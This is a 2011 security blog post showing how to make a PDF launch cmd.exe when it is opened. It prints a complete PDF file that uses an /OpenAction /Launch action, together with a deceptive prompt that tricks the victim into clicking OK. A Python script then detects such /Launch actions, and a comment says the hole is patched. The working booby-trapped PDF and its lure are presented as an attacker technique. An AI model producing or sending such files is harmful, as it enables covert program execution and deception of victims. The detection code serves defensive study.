Application security encompasses measures taken throughout the application's life-cycle to prevent exceptions in the security policy of an application or the underlying system (vulnerabilities) through flaws in the design, development, deployment, upgrade, or maintenance of the application.

Thursday, March 3, 2011

Launching .EXE File While Opening PDF

How does an attacker execute an .exe file on a victim's computer without the victim's knowledge? Answer: by using remote command execution.


There are different techniques for executing a remote command on a victim's system without the victim's knowledge.

Below is a simple example that launches an .exe file when a PDF file is opened. Using this technique, an attacker can send a PDF file that looks valuable or important, while the intention is to execute an .exe file on the victim's system.

Save the code below as a PDF file and then open it; it will call cmd.exe and open the CMD console.


%PDF-1.1

1 0 obj
<<
/Type /Catalog
/Outlines 2 0 R
/Pages 3 0 R
/OpenAction 8 0 R
>>
endobj
2 0 obj
<<
/Type /Outlines
/Count 0
>>
endobj
3 0 obj
<<
/Type /Pages
/Kids [4 0 R]
/Count 1
>>
endobj
4 0 obj
<<
/Type /Page
/Parent 3 0 R
/MediaBox [0 0 612 792]
/Contents 5 0 R
/Resources
<< /ProcSet 6 0 R
/Font << /F1 7 0 R >>
>>
>>
endobj
5 0 obj
<< /Length 46 >>
stream
BT
/F1 24 Tf
100 700 Td
(Hello World!)Tj
ET
endstream
endobj
6 0 obj
[/PDF /Text]
endobj
7 0 obj
<<
/Type /Font
/Subtype /Type1
/Name /F1
/BaseFont /Helvetica
/Encoding /MacRomanEncoding
>>
endobj
8 0 obj
<<
/Type /Action
/S /Launch
/Win
<<
/F (cmd.exe)
/P (\nTo continue viewing the encrypted content\nplease click the “Don’t show this message again” box\nand press OK!)
>>
>>
endobj
xref
0 9
0000000000 65535 f
0000000012 00000 n
0000000109 00000 n
0000000165 00000 n
0000000234 00000 n
0000000401 00000 n
0000000505 00000 n
0000000662 00000 n
trailer
<<
/Size 9
/Root 1 0 R
>>
startxref
751
%%EOF
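
As an added example (not part of the original post), the Python code below flags the construct used above: a /Launch action, the program named in its /F entry, and whether the catalog's /OpenAction runs it when the file is opened. The sample bytes are constructed, find_launch_actions and its helpers are hypothetical names, and the check assumes uncompressed objects like the ones shown here; #xx escapes in names are decoded so that /L#61unch is still matched as /Launch.

```python
import re

# Constructed sample: only the objects relevant to the check, mirroring the PDF above.
SAMPLE = b"""%PDF-1.1
1 0 obj
<< /Type /Catalog /Pages 3 0 R /OpenAction 8 0 R >>
endobj
8 0 obj
<< /Type /Action /S /Launch /Win << /F (cmd.exe) /P (click OK) >> >>
endobj
%%EOF
"""

OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj\b(.*?)endobj", re.S)
NAME_RE = re.compile(rb"/[^\s/<>\[\]()]+")
HEX_RE = re.compile(rb"#([0-9A-Fa-f]{2})")


def normalize(body: bytes) -> bytes:
    """Decode #xx escapes inside PDF names (/L#61unch -> /Launch)."""
    unescape = lambda m: bytes([int(m.group(1), 16)])
    return NAME_RE.sub(lambda n: HEX_RE.sub(unescape, n.group(0)), body)


def find_launch_actions(pdf: bytes) -> list:
    """Return one finding per indirect object that carries a /Launch action."""
    objects = {int(n): normalize(body) for n, _gen, body in OBJ_RE.findall(pdf)}
    findings = []
    for num, body in objects.items():
        if not re.search(rb"/S\s*/Launch\b", body):
            continue
        # /F holds the file to launch; allow escaped characters in the string.
        target = re.search(rb"/F\s*\(((?:\\.|[^\\)])*)\)", body)
        # Runs on open if /OpenAction references this object or holds it inline.
        ref = re.compile(rb"/OpenAction\s+%d\s+\d+\s+R" % num)
        auto = b"/OpenAction" in body or any(ref.search(b) for b in objects.values())
        findings.append({
            "object": num,
            "target": target.group(1).decode("latin-1") if target else None,
            "auto_open": auto,
        })
    return findings


if __name__ == "__main__":
    for finding in find_launch_actions(SAMPLE):
        print(finding)
```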


1 comment:

  1. This loophole has been patched in the newer versions.
